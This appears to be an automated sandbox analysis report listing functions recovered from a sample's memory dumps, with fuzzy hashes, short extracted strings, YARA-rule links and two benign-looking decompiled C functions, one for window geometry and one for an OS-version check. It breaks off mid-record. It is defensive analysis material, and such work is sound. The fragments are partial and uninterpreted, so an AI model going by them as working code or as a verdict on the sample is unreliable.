K_<, xrefs: 048E20DA

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: '>$78$K_<$q^>
API String ID: 0-578490123
Opcode ID: 720397d5cdc29c2fb5d70816e33cac4b0a34927eafca3ae9738ae95e9a724e98
Instruction ID: fb131099b94d91b26f3c097b6e9261fa2fadc9f1828dbadcc5087709c18ec45e
Opcode Fuzzy Hash: 720397d5cdc29c2fb5d70816e33cac4b0a34927eafca3ae9738ae95e9a724e98
Instruction Fuzzy Hash: E34212725083819FE378CF25C989A9BBBE2BBC5744F108A1DE5D986260DBB19945CF03

Uniqueness

Uniqueness Score: -1.00%

Function 048D2FA2, Relevance: 5.4, Strings: 4, Instructions: 377COMMON

Download Yara Rule

Strings

M/, xrefs: 048D3376
X', xrefs: 048D312F
:]@^, xrefs: 048D34D8
iz, xrefs: 048D326B

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: X'$:]@^$M/$iz
API String ID: 0-798460462
Opcode ID: 56102ecc300b5bf1fb6f5e0eccbaed3ea67ad0e19704a57689e3f29239402323
Instruction ID: 67886eb02f2857571c606f333713d61b728954e8788b90ebf6c2a6568d6ab71c
Opcode Fuzzy Hash: 56102ecc300b5bf1fb6f5e0eccbaed3ea67ad0e19704a57689e3f29239402323
Instruction Fuzzy Hash: 360252B16093809FD368CF61D589A5BBBF1FBC4718F108E1DE69A96260D7B49909CF03

Uniqueness

Uniqueness Score: -1.00%

Function 048DF83F, Relevance: 5.2, Strings: 4, Instructions: 240COMMON

Download Yara Rule

Strings

:gy, xrefs: 048DFC54
e. , xrefs: 048DFA1D
8V, xrefs: 048DFA4E
9a, xrefs: 048DFA7E

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 8V$9a$:gy$e.
API String ID: 0-1083161237
Opcode ID: fe27490aad6defa60a198fdf0e5424fe464ae493b27728caf172d4e1ad21ddca
Instruction ID: aebc7eb78a167438ccdf2a9693d0ed41cb97b70f0b4ff138bad46657bee147bf
Opcode Fuzzy Hash: fe27490aad6defa60a198fdf0e5424fe464ae493b27728caf172d4e1ad21ddca
Instruction Fuzzy Hash: 44B120715093809FC358CF6AC58841BFBE1FBC8B58F508A1DF69696260C7B5E909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 048DD091, Relevance: 5.2, Strings: 4, Instructions: 210COMMON

Download Yara Rule

Strings

mZf3, xrefs: 048DD2E9
}]}, xrefs: 048DD0CF
(, xrefs: 048DD20A
-, xrefs: 048DD16B

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ($-$mZf3$}]}
API String ID: 0-2410773837
Opcode ID: 9b165d62eac452a2904f422ce01586fa315b8e51f9823072fa261fbce4de6a4d
Instruction ID: a310140c82ea2b2281f35b2d1c038971f40c444e37a2c523cbf13c9d0e4053df
Opcode Fuzzy Hash: 9b165d62eac452a2904f422ce01586fa315b8e51f9823072fa261fbce4de6a4d
Instruction Fuzzy Hash: 41A15F725093419FD368CF65C58981BBBE1BBC9748F408E1DF29696220E3B5EA48CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048D4E8A, Relevance: 5.2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

Strings

p(F, xrefs: 048D5032
I/P, xrefs: 048D5067
"u, xrefs: 048D4F32
Q, xrefs: 048D5012

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: "u$I/P$Q$p(F
API String ID: 0-2506779150
Opcode ID: 573670ff73d2b8ce3ca8da75f375e6c7f2506ed0095ccb56662dd9f77bc631c6
Instruction ID: c03ae1b1a7440df9bfacc620bf6be78ced057f40c48552c745722ac3d4e90ffb
Opcode Fuzzy Hash: 573670ff73d2b8ce3ca8da75f375e6c7f2506ed0095ccb56662dd9f77bc631c6
Instruction Fuzzy Hash: 00915272509344ABC758DF65848941BBBF1FF88758F104E2EFA8A96620D3B19949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 048C2654, Relevance: 5.2, Strings: 4, Instructions: 178COMMON

Download Yara Rule

Strings

eQL, xrefs: 048C27CF
{t, xrefs: 048C28A7
bZ, xrefs: 048C2787
bZ, xrefs: 048C26CA

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: bZ$bZ$eQL${t
API String ID: 0-1136884693
Opcode ID: 72a90a3fb4c44a7544e3024fabe03b90c4b00f589babcd8c63b669d23def0470
Instruction ID: c592b72188e1c9448c1f5cec9671d587c48eb4ca72261c9271f95bb722b4aded
Opcode Fuzzy Hash: 72a90a3fb4c44a7544e3024fabe03b90c4b00f589babcd8c63b669d23def0470
Instruction Fuzzy Hash: D1811E719083419BC358CF25C98981BBBF4FBC5758F405E0DF68696260D7B6DA09CB43

Uniqueness

Uniqueness Score: -1.00%

Function 048CA048, Relevance: 5.2, Strings: 4, Instructions: 151COMMON

Download Yara Rule

Strings

-C, xrefs: 048CA0F7
!}, xrefs: 048CA091
;*B, xrefs: 048CA17B
JML, xrefs: 048CA1AC

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: -C$JML$!}$;*B
API String ID: 2591292051-1677314592
Opcode ID: f90dff46baa10bf35c964fef0b14b94cce9d00d2dbaff3b6837f5550d8e42564
Instruction ID: 6ff570a950a8050de8746072933492e27bd2409742bd3c26b3799b656c4524a7
Opcode Fuzzy Hash: f90dff46baa10bf35c964fef0b14b94cce9d00d2dbaff3b6837f5550d8e42564
Instruction Fuzzy Hash: 726152B1208344ABC358CE66C98582FBBE5FBC9358F405E0DF19296260D772DA458B93

Uniqueness

Uniqueness Score: -1.00%

Function 048D4BAA, Relevance: 5.1, Strings: 4, Instructions: 127COMMON

Download Yara Rule

Strings

`I, xrefs: 048D4C15
\FJ, xrefs: 048D4C7B
], xrefs: 048D4CEC
B'_, xrefs: 048D4BF5

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: B'_$\FJ$`I$ ]
API String ID: 0-1497742486
Opcode ID: 7d3dff3d62e47792e884eaca6a6270ae16b30c653ecb73c9367bba81c61436c6
Instruction ID: 2b90b854a596b25ac5a5ad6ce309fc3a56f31e550174717caf33b57dce5b05ae
Opcode Fuzzy Hash: 7d3dff3d62e47792e884eaca6a6270ae16b30c653ecb73c9367bba81c61436c6
Instruction Fuzzy Hash: 415123B1D0120DEBDF08CFA5C84A9EEFBB5FB48304F108259E121BA260E7B51A45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 048DA8F0, Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

r~, xrefs: 048DA9B1
, xrefs: 048DAA70
, xrefs: 048DAA39
Cl, xrefs: 048DAA1D

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: r~$Cl$ $
API String ID: 0-236519512
Opcode ID: 594e0f07774dd0abe1853456d589adbe5a64feb8cc77862addd2789fa035270f
Instruction ID: b471a69b114818fe6be476b47bd22a7d6296ccfd498f733b8c2b13f603e601a0
Opcode Fuzzy Hash: 594e0f07774dd0abe1853456d589adbe5a64feb8cc77862addd2789fa035270f
Instruction Fuzzy Hash: 45419A311093018F9318DF29D58151FBBE6FBC8358F244E1EF69596260D7B4EA498B87

Uniqueness

Uniqueness Score: -1.00%

Function 1000C188, Relevance: 4.5, APIs: 3, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000C188(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E1000C040() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E1000C137( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x1009411c(_a4, _a8);
			}

0x1000c197
0x1000c1ab
0x1000c1bf
0x1000c1d7
0x1000c1c1
0x1000c1c8
0x1000c1c8
0x1000c1df
0x00000000
0x1000c1e1
0x00000000
0x1000c1e8
0x1000c1df
0x00000000
0x1000c1ad
0x00000000

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c348fcb2b0effbe046435f46dcf702956091a19f244ba03ebf4b454dc8314e56
Instruction ID: 1966ee58825ac5e3b9fc2dc10a8376ef72093eed3cc0b63f0f91fbe930514f16
Opcode Fuzzy Hash: c348fcb2b0effbe046435f46dcf702956091a19f244ba03ebf4b454dc8314e56
Instruction Fuzzy Hash: 79F0F63560020DAAFF01DF60CC44DEE3EA9EB062C4F108025FD15E506AEB30DA56EB51

Uniqueness

Uniqueness Score: -1.00%

Function 048CC158, Relevance: 4.0, Strings: 3, Instructions: 230COMMON

Download Yara Rule

Strings

%, xrefs: 048CC38F
6Q0, xrefs: 048CC448
8\4, xrefs: 048CC30D

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: %$6Q0$8\4
API String ID: 0-3431016190
Opcode ID: da96f029369d2db2141ce01d6d0a16a47ea980492b886a451188afc6722659fa
Instruction ID: e5c897a44153d3175fe4b4e4e760df6cd64fa78a29a75b7b9b459b733a12a7da
Opcode Fuzzy Hash: da96f029369d2db2141ce01d6d0a16a47ea980492b886a451188afc6722659fa
Instruction Fuzzy Hash: A3C12C72508381AFD358CF25C58A90BFBF2BBC5748F009A1DF19A9A260D3B59949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 048E0B34, Relevance: 4.0, Strings: 3, Instructions: 228COMMON

Download Yara Rule

Strings

Q<, xrefs: 048E0C62
w+t, xrefs: 048E0CDB
lF, xrefs: 048E0B86

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: lF$Q<$w+t
API String ID: 0-2786256530
Opcode ID: 698c56ed28ab61734d9a399f023cebaf06ff17d989445e50a28fb0c9c68bbf7e
Instruction ID: fc81586bc375690dc5227689157a549bcd61c095ac64be21ab70f39efb5400c0
Opcode Fuzzy Hash: 698c56ed28ab61734d9a399f023cebaf06ff17d989445e50a28fb0c9c68bbf7e
Instruction Fuzzy Hash: C7A132325083409BC358CE6AD54941BFBF1EBC6758F008E2DF5A696260D3B5D949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 048C7283, Relevance: 3.9, Strings: 3, Instructions: 185COMMON

Download Yara Rule

Strings

Sw, xrefs: 048C73B5
'Z, xrefs: 048C7340
SQe, xrefs: 048C72E4

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 'Z$SQe$Sw
API String ID: 0-1092675647
Opcode ID: d7931d58e58fdcf8dfa87df5d535f1cdeb41b2081fb96627b17edf0f4dd8b08e
Instruction ID: 9b507f329ebe212cc7ba2e97aaea9dc9d5d9750304c44383093f486ec377a607
Opcode Fuzzy Hash: d7931d58e58fdcf8dfa87df5d535f1cdeb41b2081fb96627b17edf0f4dd8b08e
Instruction Fuzzy Hash: E38145716093029FD364CF25C98991BBBE2FBC8708F409D1DF68696260D771EA498F43

Uniqueness

Uniqueness Score: -1.00%

Function 048D5220, Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

\-", xrefs: 048D5265
v, xrefs: 048D529D
ux, xrefs: 048D5336

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: \-"$ux$v
API String ID: 0-1502591833
Opcode ID: e0bc148b20f5a577449e10875022397c0a08c57f11037554a1d9e6e897d2df98
Instruction ID: 7469eaf880d0a8ed26384786a03dae762ba3c8b2bf99c43ee6e6bc4529bb61c6
Opcode Fuzzy Hash: e0bc148b20f5a577449e10875022397c0a08c57f11037554a1d9e6e897d2df98
Instruction Fuzzy Hash: AA7162B1009341AFC768CF24D58951FBBE2BBC5B18F504E1EF18696220C7B59A4ACB97

Uniqueness

Uniqueness Score: -1.00%

Function 048C3C91, Relevance: 3.9, Strings: 3, Instructions: 155COMMON

Download Yara Rule

Strings

8@y, xrefs: 048C3DF2
g3, xrefs: 048C3DCF
u, xrefs: 048C3CC5

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: DeleteFilelstrcmpi
String ID: 8@y$g3$u
API String ID: 1290836619-1270726168
Opcode ID: 2d034844e19d442777f6fbc1f2b0a94b45eac22d1a6fa6f057d92e6cd4e95ebd
Instruction ID: 6bc5cf6fd17f0f0c21ac7eeafafe7421a4da7a68da44e379eb400fccd75dce84
Opcode Fuzzy Hash: 2d034844e19d442777f6fbc1f2b0a94b45eac22d1a6fa6f057d92e6cd4e95ebd
Instruction Fuzzy Hash: 6781FD71C01219EBCF59CFE5D98A8DEBFB1FB48308F208149D812B6260D3B45A4ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 048C30F6, Relevance: 3.9, Strings: 3, Instructions: 133COMMON

Download Yara Rule

Strings

`D, xrefs: 048C3200
f!, xrefs: 048C319D
i, xrefs: 048C3215

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: `D$f!$i
API String ID: 2591292051-2383949327
Opcode ID: ec6b91a4188658c5bc706a565795ffb65c51e6c81a087bdbc36a323a825ba517
Instruction ID: c957511257c9dba838aac5a2d0ebe5785af273531cba76e36b4624e36bd3f3e9
Opcode Fuzzy Hash: ec6b91a4188658c5bc706a565795ffb65c51e6c81a087bdbc36a323a825ba517
Instruction Fuzzy Hash: 9951BE715083418BDB18CF24D48996FBBE0FFC4718F108E0DF69696250DBB4EA0A8B97

Uniqueness

Uniqueness Score: -1.00%

Function 048DAC9B, Relevance: 3.9, Strings: 3, Instructions: 128COMMON

Download Yara Rule

Strings

fK, xrefs: 048DAD37
RT{, xrefs: 048DACF5
h9(, xrefs: 048DADCE

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: RT{$fK$h9(
API String ID: 0-2003623628
Opcode ID: 3bbba2050a31e3ee8d457072deb25ac2bf6fc11427baae84316959df3431de42
Instruction ID: a8ffcf8626036373c4be9414432b0f4fc5238cf03a846ab27b56c8f9410849b5
Opcode Fuzzy Hash: 3bbba2050a31e3ee8d457072deb25ac2bf6fc11427baae84316959df3431de42
Instruction Fuzzy Hash: 595164B15093469F8B48DF25C48982BBBE4FBC8358F505E0CF59692220D3B4DA59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 048DFD10, Relevance: 3.9, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

nh7, xrefs: 048DFDFD
Kt, xrefs: 048DFD90
'j, xrefs: 048DFE0E

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 'j$Kt$nh7
API String ID: 0-250860472
Opcode ID: 69860298b4b4878276910a1ad5045772d35a02c6c8037802fbedf30c8d57fc38
Instruction ID: 05c030f08fedd145c95dbefc817c92eb84951827636bfe37400130b083421faf
Opcode Fuzzy Hash: 69860298b4b4878276910a1ad5045772d35a02c6c8037802fbedf30c8d57fc38
Instruction Fuzzy Hash: 76413172D0120DABDF08CFE1C94AAEEBBB2FF44714F208199D511B6250D7B96A45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000BFE6, Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000BFE6(intOrPtr __ebx, intOrPtr __esi, void* __eflags) {
				signed int _v8;
				struct _OSVERSIONINFOA _v156;
				signed int _t9;
				intOrPtr _t21;
				intOrPtr _t22;
				char _t24;
				signed int _t27;

				_t25 = _t27;
				_t9 =  *0x1006d940; // 0xc2bf211
				_v8 = _t9 ^ _t27;
				E10041630(_t22,  &(_v156.dwMajorVersion), 0, 0x90);
				_v156.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v156);
				return E1003F29E(0 | _v156.dwPlatformId == 0x00000002, __ebx, _v8 ^ _t25, _t21, _t22, __esi, _t24);
			}

0x1000bfe9
0x1000bff1
0x1000bff8
0x1000c009
0x1000c018
0x1000c022
0x1000c03f

APIs

_memset.LIBCMT ref: 1000C009
GetVersionExA.KERNEL32(?), ref: 1000C022

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Version_memset
String ID:
API String ID: 963298953-0
Opcode ID: b86e79042bf1d55c8c7884e7df611957dff6c629d8ae202bff96447c3a10b362
Instruction ID: 79668bd42098193ee3a4d0c41b0fe43b069420ce874785e6893be6a722b6aae0
Opcode Fuzzy Hash: b86e79042bf1d55c8c7884e7df611957dff6c629d8ae202bff96447c3a10b362
Instruction Fuzzy Hash: E1F06579A1021C9FDB60DF70DD4AB9E77F8AB48304F5140A4E50DD7282DE74AA4C8F51

Uniqueness

Uniqueness Score: -1.00%

Function 048DE441, Relevance: 2.7, Strings: 2, Instructions: 234COMMON

Download Yara Rule

Strings

x+, xrefs: 048DE4EF
Xt;, xrefs: 048DE4DF

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: Xt;$x+
API String ID: 0-279117347
Opcode ID: a0ae3962c8c17e109f7354182bb2aaef5c7039709eddecec457afe7247061f19
Instruction ID: 80ce8ad91289db0c15817b3bf2d1f1f703a487e304ab9e58ec951848d1da299a
Opcode Fuzzy Hash: a0ae3962c8c17e109f7354182bb2aaef5c7039709eddecec457afe7247061f19
Instruction Fuzzy Hash: F7A173B29093409FC398CF29C48A41BFBE1BB94758F148E2DF5958A220D7B1E9098F43

Uniqueness

Uniqueness Score: -1.00%

Function 048C9A57, Relevance: 2.7, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

{?,, xrefs: 048C9D01, 048C9D05
%, xrefs: 048C9B25

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: %${?,
API String ID: 0-1801079363
Opcode ID: 172c87cebe270ccff642183cbca7dcb8fc2cea95bd133ef60e98f39c3e697795
Instruction ID: 8d54320fb17fe35059d6a48bcd3b345e890eaba409b851252a795a58f3b00289
Opcode Fuzzy Hash: 172c87cebe270ccff642183cbca7dcb8fc2cea95bd133ef60e98f39c3e697795
Instruction Fuzzy Hash: 949111B21083419FD354CF65998991BBBF1FB88748F004A1DF6A696220D3B2D959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048C3502, Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

5, xrefs: 048C3729
*^, xrefs: 048C350A

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: *^$5
API String ID: 0-1426932712
Opcode ID: 9eae6898f7d4573f21e34f4fcdb5d883b4c0e5e78adc5a0dce486df1075257e8
Instruction ID: b67d9d8abe992ebe0997ee5fbc507e3e52ea50e8227b408cbe1495fb3d4e653a
Opcode Fuzzy Hash: 9eae6898f7d4573f21e34f4fcdb5d883b4c0e5e78adc5a0dce486df1075257e8
Instruction Fuzzy Hash: CA8122B1508381AFC348DF25C98941BFBE1BBC5758F409E2DF596A6260D3B1DA49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 048C1A0A, Relevance: 2.7, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

_M , xrefs: 048C1B13
+EJ, xrefs: 048C1AB4

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: +EJ$_M
API String ID: 0-3555891106
Opcode ID: 334d0e016833eadd8854433fc3b57df645343bc0288d0f30a4717060b08be75d
Instruction ID: c09f20c22b944057abf3abe1c203c85a52c4ed8ccf32f394a57b6de67329dbe1
Opcode Fuzzy Hash: 334d0e016833eadd8854433fc3b57df645343bc0288d0f30a4717060b08be75d
Instruction Fuzzy Hash: 18618971D01209ABDF14DFA5C98A9EEFBB1FF84718F208059D202BA290D7B85A44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 048D98BD, Relevance: 2.7, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

Z!8, xrefs: 048D992E
J2, xrefs: 048D9962

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: J2$Z!8
API String ID: 0-963410357
Opcode ID: a0f36202975ff85fcae6f69b259e69c48d880b7ae1c3469607594b89595fd5a2
Instruction ID: 0eebdd8cc3e1bc9b1a616875cece6f56b18a4819a947abce3aaa4234585f467a
Opcode Fuzzy Hash: a0f36202975ff85fcae6f69b259e69c48d880b7ae1c3469607594b89595fd5a2
Instruction Fuzzy Hash: E47133B25093409FC358DF69C98981BBBF2FFC9748F009A1DF6899A260D3B5D9448F06

Uniqueness

Uniqueness Score: -1.00%

Function 048E03F1, Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

zr, xrefs: 048E05CE
PO, xrefs: 048E058F

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: PO$zr
API String ID: 0-1085754687
Opcode ID: 53a336d486f10b54ba3cdd5b206f4d6c903e22d0751232775d3d56b598d0686e
Instruction ID: 6e04bfd451c62262736009d4b91de3e71bd5f35de9e1fa3ecba64af1d53207cb
Opcode Fuzzy Hash: 53a336d486f10b54ba3cdd5b206f4d6c903e22d0751232775d3d56b598d0686e
